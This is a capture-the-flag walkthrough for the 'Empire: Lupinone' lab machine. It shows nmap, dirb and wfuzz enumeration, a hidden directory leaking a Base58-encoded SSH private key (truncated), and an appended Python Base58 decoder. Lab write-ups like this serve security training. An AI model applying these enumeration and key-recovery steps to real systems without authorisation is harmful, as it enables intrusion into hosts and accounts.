EMPIRE: LUPINONE
Difficulty: Medium
Kali attacker IP: 192.168.30.130
Target IP: 192.168.30.135
Network scan
nmap -A 192.168.30.135
Ports 22 and 80 are open. Scan for files:
dirb 192.168.30.135
Found robots.txt, with the following content:
User-agent: *
Disallow: /~myfiles
curl http://192.168.30.135/~myfiles/
##
<!DOCTYPE html>
<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Error 404</h1>
</body>
</html>
<!-- Your can do it, keep trying. -->
Searching other directories for a ~myfiles entry turned up nothing. Next, look for entries named in the same format as ~myfiles:
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.30.135/~FUZZ
Found ~secret (response code 301). Open it in a browser:
Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,
Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.
I'm smart I know that.
Any problem let me know
Your best friend icex64
Tips: username: icex64; SSH key:
cGxD6KNZQddY6iCsSuqPzU......zDgKm2gSRN8gHz3WqS
Base58 decode:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEA......4ORlsC
iUJ66WmRUN9EoVlkeCzQJwivI=
-----END OPENSSH PRIVATE KEY-----
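The Base58 decoding step above, as an added example that is not part of the original write-up: a standard-library decoder that also checks whether the result carries OpenSSH private key armour. It assumes the Bitcoin Base58 alphabet (the write-up does not say which alphabet was used); the function names are this example's own, and the sample input is constructed placeholder text, not the key from the target.

```python
# Added example: Base58 (Bitcoin alphabet) decoding, standard library only.
# Assumption: the blob uses the Bitcoin alphabet; the write-up does not say which.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {ch: i for i, ch in enumerate(ALPHABET)}


def b58decode(text: str) -> bytes:
    """Decode Base58 text to bytes, rejecting characters outside the alphabet."""
    text = "".join(text.split())  # tolerate line wrapping from copy/paste
    num = 0
    for pos, ch in enumerate(text):
        if ch not in INDEX:
            # 0, O, I and l are deliberately absent from Base58
            raise ValueError(f"invalid Base58 character {ch!r} at offset {pos}")
        num = num * 58 + INDEX[ch]
    body = num.to_bytes((num.bit_length() + 7) // 8, "big")
    # Each leading '1' stands for one leading zero byte
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode, used here only to build the constructed sample."""
    num = int.from_bytes(data, "big")
    out = ""
    while num:
        num, rem = divmod(num, 58)
        out = ALPHABET[rem] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def looks_like_openssh_key(data: bytes) -> bool:
    """True when decoded bytes carry the OpenSSH private key PEM armour."""
    return (data.lstrip().startswith(b"-----BEGIN OPENSSH PRIVATE KEY-----")
            and data.rstrip().endswith(b"-----END OPENSSH PRIVATE KEY-----"))


# Constructed sample: PEM armour around placeholder text, not a real key.
SAMPLE_PEM = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
              b"PLACEHOLDER-NOT-A-KEY\n"
              b"-----END OPENSSH PRIVATE KEY-----\n")
SAMPLE_B58 = b58encode(SAMPLE_PEM)

if __name__ == "__main__":
    decoded = b58decode(SAMPLE_B58)
    print(decoded.decode())
    print("OpenSSH key armour:", looks_like_openssh_key(decoded))
```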